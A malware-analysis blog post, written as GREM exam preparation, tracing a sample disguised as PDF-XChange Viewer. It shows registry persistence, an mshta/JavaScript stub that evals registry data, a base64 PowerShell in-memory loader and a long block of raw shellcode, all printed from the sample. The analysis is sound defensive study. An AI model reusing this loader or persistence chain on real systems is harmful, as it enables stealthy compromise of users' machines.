This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.
The name PDF-XChange Viewer was learned via static analysis with Resource Hacker. Here is what the Version Info shows.
1 VERSIONINFO FILEVERSION 2,5,314,0 PRODUCTVERSION 2,5,0,0 FILEOS 0x40004 FILETYPE 0x2 { BLOCK "StringFileInfo" { BLOCK "041504E2" { VALUE "CompanyName", "Tracker Software Products (Canada) Ltd." VALUE "FileVersion", "2.5.0314.0000" VALUE "LegalCopyright", "Copyright (C) 2001-2015 by Tracker Software Products (Canada) Ltd." VALUE "LegalTrademarks", "Tracker Software Products (Canada) Ltd." VALUE "ProductVersion", "2.5" VALUE "SpecialBuild", "" VALUE "PrivateBuild", "" VALUE "ProductName", "PDF-XChange Viewer" VALUE "Comments", "PDF-XChange Viewer" VALUE "FileDescription", "PDF-XChange Viewer" VALUE "InternalName", "PDF-XChange Viewer" VALUE "OriginalFilename", "PDFXCview.exe" } } BLOCK "VarFileInfo" { VALUE "Translation", 0x0415 0x04E2 } }
Looking at some of the artifacts created via ProcDot, we see the PDFXCView.exe process created a regsvr32.exe process. This regsvr32.exe then spawned another regsvr32.exe. This second regsvr32.exe seems to be responsible for the network communication, as it had 17 different IPs, which it attempted to communicate with. Here is the first 8 of those IPs.
At this point, we could check our logs to see if any of these IP addresses show up as a possible indicator of compromise (IoC). I recommend you look as far back as your logs allow and if possible as far forward as you can. Obviously, It also interacted heavily with the registry creating multiple keys, values and adding data. For us, we will start with the key ekce and its values.
We can further confirm these IoCs exist by looking at the registry from a snapshot perspective.
C:\Users\SecurityNik> reg query HKCU\Software\EKCE HKEY_CURRENT_USER\Software\EKCE bnjfoe REG_SZ IS*Œõ;¢´÷ªÙk®#°*R¼˜pM®9ê£ö4ŒßÁÓÏ·(ê5Ðñ]¶ ¶%&´^÷pA¬å4ñªy‰Ïòƒ®ßt2&¤UêmµuE•¢f-¨²Ó¯Vˆ/ŒÁ%ÜIšttÑaùZ†—¡óÖ££6¬‡“(¥X‰nµÐÄ_¾ômþWtÝtbäü®7óÇ€ú`Ç÷6¦øWXst¦@Û8@žg]¹h4s¦ÔTm˜»òÙ{Vðœ€D@ÀñÏ%Û—¹Èß7@ª©ËGç»ÛO‡Èl›lovË.‚`(S[¢ƒÂQ¡Áa² plfi REG_SZ NPrroM5ZysxcLiKdpLy="B3E3mloEQ5uU3w0Z8h";vrZlTAZwOKvfQEfE0cJrFoOF="YiKC3bjjjJDFWXEEDg0PC3FrDN8pH3TIK";FFLwfclpPFBQD6UoVA="BJ0L2xhvpOcszH0IWILEwHTSQFlKvVxuRn2siTsbLoobEML"; ....... cDmpN1XoNa3BU4WhsAOGfdprm1q";PrCPNgXpjPvBfSpeFw5jxK="CYME5CVTpkG5w8tWogmKv"; glrdixnng REG_SZ c24QjMM5VPvyv82p/aEZBKOJdPFdX5HDM8pLFrGfh896eGOHr5ccZ/3ZTiEZknaG5AtOm7vEgowXZ6HmFWHfnkHgjnV6ij80S5JJV39UWvVf0J5mIn8NiUatc3ge8fnkFgHCd4LKkVKgyPjAlg+xrnb+9l9QrfaPiwibloMsXDQLv1YNwbEa7t69c2xlDQ0ugVys7/aw94Msj0goX3c= gafd REG_SZ dzoW2sc/WBxJFA== hpcf REG_SZ eGsRipdqURkmT5D/HLuGur9p+ejPfpk= cqtr REG_SZ eGwQ2sU6UznMUT6H0D8tbIw=
Funny enough above we see PDFXCView also interacted with HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ which is used for persistence. The image above suggests the file 1065d.bat which is shown below was set as a value. However, looking at that key in the registry, there seems to be no evidence that this value exists.
C:\Users\SecurityNik> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive REG_SZ "C:\Users\SecurityNik\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background (Default) REG_SZ (value not set)
Worse yet, when I looked at this from the perspective of regedit.exe, I got the error below.
C:\Users\SecurityNik>autorunsc -nobanner -a * > auturuns.txt C:\Users\SecurityNik>type auturuns.txt | findstr /i "1065d.bat" "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat" c:\users\securitynik\appdata\local\2e957\1065d.bat "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat" c:\users\securitynik\appdata\local\2e957\1065d.bat
Interesting, Autorunsc shows the Default key actually has data that points to our suspicious file.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive "C:\Users\SecurityNik\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background Microsoft OneDrive Microsoft Corporation 20.169.823.6 c:\users\securitynik\appdata\local\microsoft\onedrive\onedrive.exe 3/17/2012 12:37 PM (Default) "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat" c:\users\securitynik\appdata\local\2e957\1065d.bat 12/15/2020 10:15 AM
Additionally, if you look above, you see two files have been created in the C:\Users\SecurityNik\AppData\Local\2e957\ directory as show below.
C:\Users\SecurityNik>dir C:\Users\SecurityNik\AppData\Local\2e957\ Volume in drive C has no label. Volume Serial Number is 6C10-15EA Directory of C:\Users\SecurityNik\AppData\Local\2e957 12/15/2020 10:15 AM <DIR> . 12/15/2020 10:15 AM <DIR> .. 12/15/2020 10:15 AM 68 1065d.bat 12/15/2020 10:15 AM 16,335 67dd8.f5298e 2 File(s) 16,403 bytes 2 Dir(s) 37,282,160,640 bytes free
Looking into the .bat file, we see what looks like an attempt to start the second file in the folder.
C:\Users\SecurityNik>type AppData\Local\2e957\1065d.bat start "MtyUdsl9htzewASTiSAqN5" "%LOCALAPPDATA%\2e957\67dd8.f5298e"
For the second file, we did not get much.
C:\Users\SecurityNik>type AppData\Local\2e957\67dd8.f5298e Ä»^╪2≥QR╩L*sÄ3═üïsÑ50ß⌐Lp┐>%≡■^í│wO
Running strings also did not return much. Looking at the file from the perspective of a hex editor, did not make things easier either.
This regsrv32.exe also then created a third regsvr32.exe with one thread.
Continuing to focus on the additional registry created under:
HKCU\Software\Classes\.f5298e\ HKCU\Software\ekce\
Starting with HKCU\Software\Classes\, Microsoft states "The subkeys and registry values associated with the HKEY_LOCAL_MACHINE\SOFTWARE\Classes key contain information about an application that is needed to support COM functionality."
If we look closely above, the registry key has a value of .f5298e looking closer at the file name above which the .bat file is starting, we see it ends with the same .f5298e extension. Looking at any values associated with this registry key we see ada3d which suggests the application needed to open this application can be found at HKCU\Software\Classes\ada3d.
C:\Users\SecurityNik>reg query HKCU\Software\Classes\.f5298e HKEY_CURRENT_USER\Software\Classes\.f5298e (Default) REG_SZ ada3d
Slight detour and for context.
If we look at the .html extension on my VM, we see FirefoxHTML seems to be the application that is needed to open HTML files.
C:\Users\SecurityNik>reg query HKCU\Software\Classes\.html HKEY_CURRENT_USER\Software\Classes\.html (Default) REG_SZ FirefoxHTML
C:\Users\SecurityNik>reg query HKCU\Software\Classes\FirefoxHTML HKEY_CURRENT_USER\Software\Classes\FirefoxHTML (Default) REG_SZ Firefox HTML Document FriendlyTypeName REG_SZ Firefox HTML Document EditFlags REG_DWORD 0x2 HKEY_CURRENT_USER\Software\Classes\FirefoxHTML\DefaultIcon HKEY_CURRENT_USER\Software\Classes\FirefoxHTML\shell
Now that we know we should look to HKCU\Software\Classes\ada3d for information on how the extension should be handled, let's do that. First up, it looks like we need to go a couple of levels down to get to the data of interest.
C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d HKEY_CURRENT_USER\Software\Classes\ada3d\shell C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell\open HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open\command
After digging, we see the mshta.exe launched what seems to be some Javascript which is attempting to execute WScript.Shell to read the contents in HKCU\Software\ekce\plfi which is one of he entries we learned about above.
C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell\open\command HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open\command (Default) REG_SZ "C:\Windows\system32\mshta.exe" "javascript:AbkY6N="3Kf";x7K=new ActiveXObject("WScript.Shell");VqmR6="NECv";H2Oin=x7K.RegRead("HKCU\\software\\ekce\\plfi");UY8RKFuW="jhsi";eval(H2Oin);DKqf1D="Z";"
Here is a clearer view from JSBeautifier.
AbkY6N = "3Kf"; x7K = new ActiveXObject("WScript.Shell"); VqmR6 = "NECv"; H2Oin = x7K.RegRead("HKCU\\software\\ekce\\plfi"); UY8RKFuW = "jhsi"; eval(H2Oin); DKqf1D = "Z";
Exporting the contents of the registry key,
C:\Users\SecurityNik>reg export HKCU\software\ekce plfi.txt The operation completed successfully.
After cleaning up the contents of the file I then run it through Spider Monkey
remnux@remnux:/tmp$ js -f /usr/share/remnux/objects.js -f plfi.js > plfi.js.output
After running through SpiderMonkey, we now have some contents which makes sense at the beginning and some more than makes sense at the end. However, in the middle we have lots of what seems like nonsense. :-)
eNGi6Q4XNXtAFlwfXARQZOEL="nql8mNW1a1UmaBwrCuMfP6YjDPsY3Gn";f3ZASgdXhdtqDojQ0AkPb="fdX0aI0SmrtMn2zK9r";FqXe6cLyeADEEStyryEvK="IudXFkk4EVPblmOYkfhnm2sQ2TO";sSiisGwbayaiTIYmKqqZ8D="FZOB3uHZzMlwUDkS9";rhKHPnauZICdTSZ9NBaA="x6nrUpsNijADFNfErU3yesEW";try{moveTo(-100,-100);resizeTo(0,0);q7N=new ActiveXObject("WScript.Shell");(q7N.Environment("Process"))("cuez")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('I3d1a2JwendqZHZlc3ptaXVqZW9mZw0Kc2xlZXAoMTUpO3RyeXsNCiNtcHhyZA0KZnVuY3Rpb24gZ2RlbGVnYXRlew0KI2d2Y2MNClBhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7DQojc2h0bnZ4eGJmDQokVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1 .............. gQChbSW50UHRyXSxbVUludDMyXSxbVUludDMyXSxbVUludDMyXSxbVUludDMyXSxbSW50UHRyXSkgKFtJbnRQdHJdKSkpKS5JbnZva2UoMCwwLCRwciwkcHIsMCwwKTsNCiN3cHpvbWVjDQp9c2xlZXAoMTIwMCk7fWNhdGNoe31leGl0Ow0KI2R3a2p0dHV1ZQ0KI3lzaXVheWl2dWENCg==')))";g4wAd3=q7N.Run("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:cuez",0,1);}catch(e){}close(); // close()
Above we see FromBase64String, suggesting the content is base64 encoded. Taking advantage of CyberChef to decode (make sense of what I previously called nonsense) this content, we see below in yellow what suggests we are dealing with PowerShell.
#wukbpzwjdveszmiujeofg sleep(15);try{ #mpxrd function gdelegate{ #gvcc Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]); #shtnvxxbf $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]); #qchm $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed"); #zzeiqapejn $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed"); #lskfqqq return $TypeBuilder.CreateType();} #cvhi function gproc{ #tezffvn Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure); #icaibabqun $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")}; #faymzrobss $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods"); #rvbu return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));} #bujmhw [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,<#eg#>0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,<#ndl#>0x6A,0x18,0x59,0x31,0xFF,<#xo#>0x31,0xC0,0xAC,<#ifd#>0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,<#qu#>0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,<#vkc#>0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,<#ulq#>0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,<#lt#>0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,<#da#>0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,<#zq#>0xFF,0xFF,<#kbv#>0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,<#cvq#>0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,<#fys#>0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#ya#>0x61,0x72,0x79,0x41,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#sl#>0x45,0xFC,0x33,0xD2,<#gj#>0x52,0x50,0x8B,0xC6,0x03,0xC0,<#anh#>0x99,0x03,0x04,0x24,0x13,<#dz#>0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#jtt#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,<#aaw#>0x50,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,0x75,<#jdj#>0x38,0x8B,0x45,0xCC,<#dtd#>0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,<#kb#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,<#jta#>0x52,<#phr#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,0x81,<#ros#>0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,<#gr#>0x08,<#zb#>0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,<#gtc#>0xCC,0x8B,<#ua#>0x40,<#me#>0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#ew#>0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,<#it#>0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#br#>0xA8,<#no#>0x81,0x39,0x45,0x78,0x69,0x74,<#rpm#>0x75,0x63,0x8D,0x41,0x04,0x81,0x38,0x50,<#vwd#>0x72,0x6F,0x63,0x75,0x58,0x8D,<#nik#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,<#gt#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#hx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#wac#>0x8B,0x52,0x1C,<#yhq#>0x03,0x55,0xFC,0x0F,0xB7,<#ub#>0xC0,0xC1,0xE0,0x02,0x03,<#xvx#>0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,<#xi#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,0xFE,<#jgv#>0xFF,0xFF,0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,<#few#>0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,<#pqm#>0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,<#ow#>0x85,<#he#>0x36,0xFF,0xFF,0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,<#vi#>0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,<#bwf#>0xFF,0xFF,0x00,0x8D,0x85,<#hca#>0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,<#cz#>0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,<#gb#>0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,<#gk#>0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,<#vrg#>0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,<#ff#>0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,<#yr#>0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#cbm#>0x8B,0xC3,0x33,<#pdr#>0xD2,<#xuj#>0x52,0x50,<#ect#>0x8B,0x45,0xCC,<#esg#>0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,<#mw#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#llc#>0xC4,<#gc#>0x08,0x8B,0x08,0x03,0xCB,0x81,<#ca#>0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,<#bn#>0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,<#xy#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#oa#>0xC3,0x33,0xD2,<#vg#>0x52,0x50,0x8B,0xC6,<#da#>0x03,0xC0,0x99,<#ht#>0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#aae#>0x8B,0x52,0x1C,0x03,<#gt#>0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,<#pp#>0x8D,0x41,0x04,0x81,0x38,0x75,0x65,0x72,0x79,<#yht#>0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,<#vq#>0x38,0x65,0x45,0x78,0x41,<#vh#>0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,<#ys#>0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,<#sw#>0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,<#smh#>0x02,0x03,0xC3,0x89,0x45,<#hj#>0xAC,0x46,0xFF,0x8D,<#dyn#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x8B,<#fq#>0x45,0x08,0x05,0x48,0x0A,0x00,<#lz#>0x00,0x89,0x85,0x7C,<#mfp#>0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,<#nhq#>0x85,0x64,<#zmn#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,<#con#>0x68,0x02,0x00,0x00,0x80,<#mla#>0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#efd#>0x8D,<#sry#>0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,<#ay#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,<#vgq#>0x85,0x7C,0xFF,<#fam#>0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,<#uwj#>0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,<#goi#>0x60,<#isp#>0xFF,0xFF,0xFF,<#ahc#>0x50,0x6A,<#gpr#>0x00,0xFF,0x55,<#uzi#>0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,<#tc#>0xBD,0x64,<#ucu#>0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#rwz#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,0x85,0xB8,0x00,<#ut#>0x00,0x00,0x33,0xC0,0x89,0x85,<#ona#>0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,<#btw#>0x85,<#yzx#>0x60,0xFF,0xFF,0xFF,0x8D,<#yco#>0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,<#fi#>0x85,0xC0,<#mfr#>0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#or#>0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#by#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#jo#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,<#cf#>0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,<#rqy#>0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#em#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#ut#>0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xDC,<#hjy#>0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,<#nwm#>0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,<#bmw#>0x00,0xFA,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,<#jd#>0x83,<#pq#>0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x03,0x19,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#kn#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,<#ez#>0x00,0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,<#pgr#>0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,0x04,<#lr#>0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,<#jij#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,0xFF,<#vw#>0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,<#iku#>0xFF,0x8B,0x85,<#js#>0x60,<#kd#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,<#wh#>0x78,0xFF,0xFF,<#wwb#>0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,0xFF